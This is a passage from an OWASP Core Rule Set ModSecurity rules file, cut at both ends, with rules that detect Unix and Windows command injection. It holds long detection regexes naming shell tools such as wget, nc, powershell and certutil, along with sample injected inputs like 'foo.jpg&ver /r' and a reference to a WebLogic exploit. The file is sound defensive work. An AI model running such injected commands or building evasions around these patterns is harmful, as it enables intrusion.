\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t|e[\\\\'\"]*(?:\s|<|>).*)|i[\\\\'\"]*m[\\\\'\"]*e[\\\\'\"]*(?:o[\\\\'\"]*u[\\\\'\"]*t|(?:\s|<|>).*)|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r[\\\\'\"]*(?:\s|<|>).*)|o[\\\\'\"]*(?:u[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|u[\\\\'\"]*(?:n[\\\\'\"]*(?:l[\\\\'\"]*(?:i[\\\\'\"]*n[\\\\'\"]*k[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*m[\\\\'\"]*a)|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o
)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l)|l[\\\\'\"]*i[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*(?:\s|<|>).*)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l(?:[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w))?|(?:(?:o[\\\\'\"]*u[\\\\'\"]*n|u[\\\\'\"]*t)[\\\\'\"]*t|v)[\\\\'\"]*(?:\s|<|>).*)|x[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|(?:\s|<|>).*)|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s|t[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*m|x[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*)|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|i[\\\\'\"]*p[\\\\'\"]*(?:\s|<|>).*|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|o[\\\\'\"]*(?:p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*l|n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*(?:a[\\\\'\"]*m[\\\\'\"]*i|(?:\s|<|>).*)|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|v[\\\\'\"]*i[\\\\'\"]*(?:m[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r|p[\\\\'\"]*w)|y[\\\\'\"]*u[\\\\'\"]*m)\b" \ + "id:932105,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + 
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows command injection ] +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# A command injection takes a form such as: +# +# foo.jpg&ver /r +# foo.jpg|ver /r +# +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. +# +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in CMD syntax, such as: ; | & ` +# +# Anatomy of the regexp: +# +# 1. Starting tokens +# +# ; ;cmd +# \{ {cmd +# \| |cmd +# \|\| ||cmd +# & &cmd +# && &&cmd +# \n \ncmd +# \r \rcmd +# ` `cmd +# +# 2. Command prefixes +# +# ( (cmd) +# , ,cmd +# @ @cmd +# ' 'cmd' +# " "cmd" +# \s spacing+cmd +# +# 3. Paths +# +# [\w'\"\./]+/ /path/cmd +# [\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\ C:\Program Files\cmd +# [\^\.\w '\"/\\\\]*\\\\)?[\"\^]* \\net\share\dir\cmd +# +# 4. Quoting +# +# \" "cmd" +# \^ ^cmd +# +# 5. Extension/switches +# +# \.[\"\^]*\w+ cmd.com, cmd.exe, etc. +# /b cmd/h +# +# An effort is made to combat evasions by CMD syntax; for example, +# the following strings are valid: c^md, @cmd, "c"md. ModSecurity +# has a t:cmdLine transformation built-in to deal with some of these, +# but unfortunately, that transformation replaces ';' characters (so +# we cannot match on the start of a command) and '\' characters (so we +# have trouble matching paths). This makes the regexp more complex. +# +# This rule is case-insensitive. 
+# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* +# [regexp assembled from util/regexp-assemble/regexp-932110.txt] +# (?:\.[\"\^]*\w+)?\b" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:m[\"\^]*(?:y[\"\^]*s[\"\^]*q[\"\^]*l(?:[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p(?:[\"\^]*s[\"\^]*l[\"\^]*o[\"\^]*w)?|h[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*h[\"\^]*o[\"\^]*w))?|s[\"\^]*(?:i[\"\^]*(?:n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2|e[\"\^]*x[\"\^]*e[\"\^]*c)|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|g[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*c)|o[\"\^]*(?:u[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|v[\"\^]*o[\"\^]*l)|v[\"\^]*e[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r|[dr][\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*i[\"\^]*n[\"\^]*k)|d[\"\^]*(?:s[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*d|(?:[\s,;]|\.|/|<|>).*)|a[\"\^]*p[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*d|b[\"\^]*s[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*i|e[\"\^]*a[\"\^]*s[\"\^]*u[\"\^]*r[\"\^]*e|m[\"\^]*s[\"\^]*y[\"\^]*s)|d[\"\^]*(?:i[\"\^]*(?:s[\"\^]*k[\"\^]*(?:(?:m[\"\^]*g[\"\^]*m|p[\"\^]*a[\"\^]*r)[\"\^]*t|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|r[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*e)|f[\"\^]*f[\"\^]*(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*(?:l[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*f|t[\"\^]*r[\"\^]*e[\"\^]*e|(?:[\s,;]|\.|/|<|>).*)|v[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c
[\"\^]*o[\"\^]*n)|(?:f[\"\^]*r[\"\^]*a|b[\"\^]*u)[\"\^]*g)|s[\"\^]*(?:a[\"\^]*(?:c[\"\^]*l[\"\^]*s|d[\"\^]*d)|q[\"\^]*u[\"\^]*e[\"\^]*r[\"\^]*y|m[\"\^]*o[\"\^]*(?:v[\"\^]*e|d)|g[\"\^]*e[\"\^]*t|r[\"\^]*m)|(?:r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r|o[\"\^]*s[\"\^]*k[\"\^]*e)[\"\^]*y|(?:c[\"\^]*o[\"\^]*m[\"\^]*c[\"\^]*n[\"\^]*f|x[\"\^]*d[\"\^]*i[\"\^]*a)[\"\^]*g|a[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|n[\"\^]*s[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|c[\"\^]*(?:o[\"\^]*(?:m[\"\^]*(?:p[\"\^]*(?:(?:a[\"\^]*c[\"\^]*t[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|m[\"\^]*g[\"\^]*m[\"\^]*t)|e[\"\^]*x[\"\^]*p)|n[\"\^]*(?:2[\"\^]*p|v[\"\^]*e)[\"\^]*r[\"\^]*t|p[\"\^]*y)|l[\"\^]*(?:e[\"\^]*a[\"\^]*(?:n[\"\^]*m[\"\^]*g[\"\^]*r|r[\"\^]*m[\"\^]*e[\"\^]*m)|u[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*r)|h[\"\^]*(?:k[\"\^]*(?:n[\"\^]*t[\"\^]*f[\"\^]*s|d[\"\^]*s[\"\^]*k)|d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|s[\"\^]*(?:c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|c[\"\^]*m[\"\^]*d)|v[\"\^]*d[\"\^]*e)|e[\"\^]*r[\"\^]*t[\"\^]*(?:u[\"\^]*t[\"\^]*i[\"\^]*l|r[\"\^]*e[\"\^]*q)|a[\"\^]*(?:l[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|c[\"\^]*l[\"\^]*s)|m[\"\^]*d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|i[\"\^]*p[\"\^]*h[\"\^]*e[\"\^]*r|u[\"\^]*r[\"\^]*l)|f[\"\^]*(?:o[\"\^]*r[\"\^]*(?:m[\"\^]*a[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*n[\"\^]*d[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|s[\"\^]*t[\"\^]*r)|s[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*(?:p[\"\^]*(?:[\s,;]|\.|/|<|>).*|y[\"\^]*p[\"\^]*e)|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|c[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*r[\"\^]*e[\"\^]*p)|n[\"\^]*(?:e[\"\^]*t[\"\^]*(?:s[\"\^]*(?:t[\"\^]*a[\"\^]*t|v[\"\^]*c|h)|(?:[\s,;]|\.|/|<|>).*|c[\"\^]*a[\"\^]*t|d[\"\^]*o[\"\^]*m)|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|r[\"\^]*i[\"\^]*g[\"\^]*h[\"\^]*t[\"\^]*s)|(?:s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u|m[\"\^]*a)[\"\^]*p|c[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|a[\"\^]*t)|b
[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|e[\"\^]*(?:x[\"\^]*p[\"\^]*(?:a[\"\^]*n[\"\^]*d[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*(?:c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e|v[\"\^]*w[\"\^]*r)|n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|g[\"\^]*r[\"\^]*e[\"\^]*p|r[\"\^]*a[\"\^]*s[\"\^]*e|c[\"\^]*h[\"\^]*o)|g[\"\^]*(?:a[\"\^]*t[\"\^]*h[\"\^]*e[\"\^]*r[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*w[\"\^]*o[\"\^]*r[\"\^]*k[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*(?:(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l|e[\"\^]*d[\"\^]*i)[\"\^]*t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|i[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*t[\"\^]*m[\"\^]*a[\"\^]*c)|i[\"\^]*(?:r[\"\^]*b(?:[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))?|f[\"\^]*m[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*e[\"\^]*r|p[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|n[\"\^]*e[\"\^]*t[\"\^]*c[\"\^]*p[\"\^]*l|c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s)|a[\"\^]*(?:d[\"\^]*(?:d[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*s|m[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*m[\"\^]*d)|r[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*t[\"\^]*r[\"\^]*i[\"\^]*b|s[\"\^]*s[\"\^]*o[\"\^]*c|z[\"\^]*m[\"\^]*a[\"\^]*n)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*i[\"\^]*m[\"\^]*e|m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f)|a[\"\^]*b[\"\^]*e[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*r[\"\^]*m[\"\^]*g[\"\^]*r)|b[\"\^]*(?:(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)|r[\"\^]*o[\"\^]*w[\"\^]*s[\"\^]*t[\"\^]*a)[\"\^]*t|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|o[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*f[\"\^]*g)|h[\"\^]*(?:o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e|d[\"\^]*w[\"\^]*w[\"\^]*i[\"\^]*z)|j[\"\^]*a[\"\^]*v[\"\^]*a[\"\^]*(?:[\s,;]|\.|/|<|>).*|7[\"\^]*z(?:[\"\^]*[ar])?)(?:\.[\"\^]*\w+)?\b" \ + "id:932110,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Apache 2.2 requires configuration file lines to be under 8kB. +# Therefore, some remaining commands have been split off to a separate rule. +# For explanation of this rule, see rule 932110. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* +# [regexp assembled from util/regexp-assemble/regexp-932110.txt] +# (?:\.[\"\^]*\w+)?\b" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w 
'\"/\\\\]*\\\\)?[\"\^]*(?:s[\"\^]*(?:y[\"\^]*s[\"\^]*(?:t[\"\^]*e[\"\^]*m[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*t[\"\^]*i[\"\^]*e[\"\^]*s[\"\^]*(?:d[\"\^]*a[\"\^]*t[\"\^]*a[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*p[\"\^]*r[\"\^]*e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|(?:p[\"\^]*e[\"\^]*r[\"\^]*f[\"\^]*o[\"\^]*r[\"\^]*m[\"\^]*a[\"\^]*n[\"\^]*c|h[\"\^]*a[\"\^]*r[\"\^]*d[\"\^]*w[\"\^]*a[\"\^]*r)[\"\^]*e|a[\"\^]*d[\"\^]*v[\"\^]*a[\"\^]*n[\"\^]*c[\"\^]*e[\"\^]*d)|i[\"\^]*n[\"\^]*f[\"\^]*o)|k[\"\^]*e[\"\^]*y|d[\"\^]*m)|h[\"\^]*(?:o[\"\^]*(?:w[\"\^]*(?:g[\"\^]*r[\"\^]*p|m[\"\^]*b[\"\^]*r)[\"\^]*s|r[\"\^]*t[\"\^]*c[\"\^]*u[\"\^]*t)|e[\"\^]*l[\"\^]*l[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*a[\"\^]*s|u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|r[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*w|a[\"\^]*r[\"\^]*e|i[\"\^]*f[\"\^]*t)|e[\"\^]*(?:t[\"\^]*(?:(?:x[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l)|c[\"\^]*p[\"\^]*o[\"\^]*l|l[\"\^]*e[\"\^]*c[\"\^]*t)|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|l[\"\^]*i[\"\^]*s[\"\^]*t)|u[\"\^]*b[\"\^]*(?:i[\"\^]*n[\"\^]*a[\"\^]*c[\"\^]*l|s[\"\^]*t)|t[\"\^]*a[\"\^]*r[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|i[\"\^]*g[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f|l[\"\^]*(?:e[\"\^]*e[\"\^]*p|m[\"\^]*g[\"\^]*r)|o[\"\^]*r[\"\^]*t|f[\"\^]*c|v[\"\^]*n)|p[\"\^]*(?:s[\"\^]*(?:s[\"\^]*(?:h[\"\^]*u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|e[\"\^]*r[\"\^]*v[\"\^]*i[\"\^]*c[\"\^]*e|u[\"\^]*s[\"\^]*p[\"\^]*e[\"\^]*n[\"\^]*d)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:g[\"\^]*e[\"\^]*d[\"\^]*o[\"\^]*n|l[\"\^]*i[\"\^]*s[\"\^]*t)|i[\"\^]*s[\"\^]*t)|p[\"\^]*(?:a[\"\^]*s[\"\^]*s[\"\^]*w[\"\^]*d|i[\"\^]*n[\"\^]*g)|g[\"\^]*e[\"\^]*t[\"\^]*s[\"\^]*i[\"\^]*d|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*i[\"\^]*l[\"\^]*e|i[\"\^]*n[\"\^]*f[\"\^]*o|k[\"\^]*i[\"\^]*l[\"\^]*l)|o[\"\^]*(?:w[\"\^]*e[\"\^]*r[\"\^]*(?:s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l(?:[\"\^]*_[\"\^]*i[\"\^]*s[\"\^]*e)?|c[\"\^]*f[\"\^]*g)|r[\"\^]*t[\"\^]*q[\"\^]*
r[\"\^]*y|p[\"\^]*d)|r[\"\^]*(?:i[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|b[\"\^]*r[\"\^]*m)|n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|m[\"\^]*n[\"\^]*g[\"\^]*r)|o[\"\^]*m[\"\^]*p[\"\^]*t)|a[\"\^]*t[\"\^]*h[\"\^]*(?:p[\"\^]*i[\"\^]*n[\"\^]*g|(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*r[\"\^]*(?:l(?:[\"\^]*(?:s[\"\^]*h|5))?|f[\"\^]*m[\"\^]*o[\"\^]*n)|y[\"\^]*t[\"\^]*h[\"\^]*o[\"\^]*n(?:[\"\^]*(?:3(?:[\"\^]*m)?|2))?|k[\"\^]*g[\"\^]*m[\"\^]*g[\"\^]*r|h[\"\^]*p(?:[\"\^]*[57])?|u[\"\^]*s[\"\^]*h[\"\^]*d|i[\"\^]*n[\"\^]*g)|r[\"\^]*(?:e[\"\^]*(?:(?:p[\"\^]*l[\"\^]*a[\"\^]*c[\"\^]*e|n(?:[\"\^]*a[\"\^]*m[\"\^]*e)?|s[\"\^]*e[\"\^]*t)[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*(?:s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2|e[\"\^]*d[\"\^]*i[\"\^]*t|(?:[\s,;]|\.|/|<|>).*|i[\"\^]*n[\"\^]*i)|c[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c|o[\"\^]*v[\"\^]*e[\"\^]*r)|k[\"\^]*e[\"\^]*y[\"\^]*w[\"\^]*i[\"\^]*z)|u[\"\^]*(?:n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|a[\"\^]*s)|b[\"\^]*y[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))|a[\"\^]*(?:s[\"\^]*(?:p[\"\^]*h[\"\^]*o[\"\^]*n[\"\^]*e|d[\"\^]*i[\"\^]*a[\"\^]*l)|r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*r[\"\^]*e)|o[\"\^]*(?:u[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)|s[\"\^]*(?:t[\"\^]*r[\"\^]*u[\"\^]*i|y[\"\^]*n[\"\^]*c)|d[\"\^]*(?:[\s,;]|\.|/|<|>).*)|t[\"\^]*(?:a[\"\^]*(?:s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*c[\"\^]*h[\"\^]*d|m[\"\^]*g[\"\^]*r)|k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n)|(?:i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u|p[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*i|e[\"\^]*l[\"\^]*n[\"\^]*e|l[\"\^]*i[\"\^]*s)[\"\^]*t|s[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c[\"\^]*o|s[\"\^]*h[\"\^]*u[\"\^]*t[\"\^]*d)[\"\^]*n|y[\"\^]*p[\"\^]*e[\"\^]*(?:p[\"\^]*e[\"\^]*r[\"\^]*f|(?:[\s,;]|\.|/|<|>).*)|r[\"\^]*(?:a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*t|e[\"\^]*e))|w[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*i[\"\^]*f[\"\^]*f|m[\"\^]*s[\"\^]*d[\"\^]*p|v[\"\
^]*a[\"\^]*r|r[\"\^]*[ms])|u[\"\^]*(?:a[\"\^]*(?:u[\"\^]*c[\"\^]*l[\"\^]*t|p[\"\^]*p)|s[\"\^]*a)|s[\"\^]*c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|u[\"\^]*i)|e[\"\^]*v[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|m[\"\^]*i[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c)|a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|g[\"\^]*e[\"\^]*t)|u[\"\^]*(?:s[\"\^]*(?:e[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*t[\"\^]*r[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s|r[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|n[\"\^]*(?:r[\"\^]*a[\"\^]*r|z[\"\^]*i[\"\^]*p))|q[\"\^]*(?:u[\"\^]*e[\"\^]*r[\"\^]*y[\"\^]*(?:[\s,;]|\.|/|<|>).*|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a|g[\"\^]*r[\"\^]*e[\"\^]*p)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*(?:a[\"\^]*d[\"\^]*3[\"\^]*2|c[\"\^]*o[\"\^]*n[\"\^]*f)|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|v[\"\^]*(?:o[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y)|x[\"\^]*c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|o[\"\^]*p[\"\^]*y)|z[\"\^]*i[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*)(?:\.[\"\^]*\w+)?\b" \ + "id:932115,\ + phase:2,\ + block,\ + 